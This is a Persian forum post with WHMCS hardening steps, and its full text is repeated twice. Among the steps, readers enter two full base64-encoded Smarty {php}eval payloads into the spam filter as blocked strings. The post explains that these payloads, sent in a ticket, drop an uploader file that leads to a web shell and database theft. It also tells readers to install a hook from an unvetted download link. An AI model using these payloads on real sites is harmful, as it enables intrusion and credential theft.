چند ساعت پیش واسه یکی از دوستان داشتم امنیت سایتش که whmcs هست انجام میدادم گفتم بذارم دوستان استفاده کنند
تو لینک زیر توضیحاتی داده شده
کد PHP: [align=LEFT] http://forum.whmcs.com/showthread.php?43462-Security-Patch
[/align] خب
پوشه ی templates_c و attachments و downloads به شاخه اصلی (HOME)
فایل configuration.php باز کرده و محتویات زیر بریزید داخلش
کد PHP: [align=LEFT] <?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$db_password = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$db_name = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$cc_encryption_hash = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?> [/align] ه جای username نام کاربری هاستتان را بنویسید
دسترسی فایل Config رو به ۴۴۴ تغیر دهید .
فایل زیر را دانلود و انزیپ کنید. سپس exploitsblock.php را در پوشه /includes/hooks اپلود کنید. این کار از اجرای فایل های PHP و کدهای PHP جلوگیری میکنه.
کد PHP: [align=LEFT] up.6o5ia.ir/uploads/13387578181.zip
[/align] برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت
کد PHP: [align=LEFT] {php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
[/align] کد PHP: [align=LEFT] {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphR zhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
[/align] خیلی تا ثیر داره
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
تو لینک زیر توضیحاتی داده شده
کد PHP: [align=LEFT] http://forum.whmcs.com/showthread.php?43462-Security-Patch
[/align] خب
پوشه ی templates_c و attachments و downloads به شاخه اصلی (HOME)
فایل configuration.php باز کرده و محتویات زیر بریزید داخلش
کد PHP: [align=LEFT] <?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$db_password = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$db_name = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$cc_encryption_hash = "۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?> [/align] ه جای username نام کاربری هاستتان را بنویسید
دسترسی فایل Config رو به ۴۴۴ تغیر دهید .
فایل زیر را دانلود و انزیپ کنید. سپس exploitsblock.php را در پوشه /includes/hooks اپلود کنید. این کار از اجرای فایل های PHP و کدهای PHP جلوگیری میکنه.
کد PHP: [align=LEFT] up.6o5ia.ir/uploads/13387578181.zip
[/align] برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت
کد PHP: [align=LEFT] {php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
[/align] کد PHP: [align=LEFT] {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphR zhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
[/align] خیلی تا ثیر داره
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64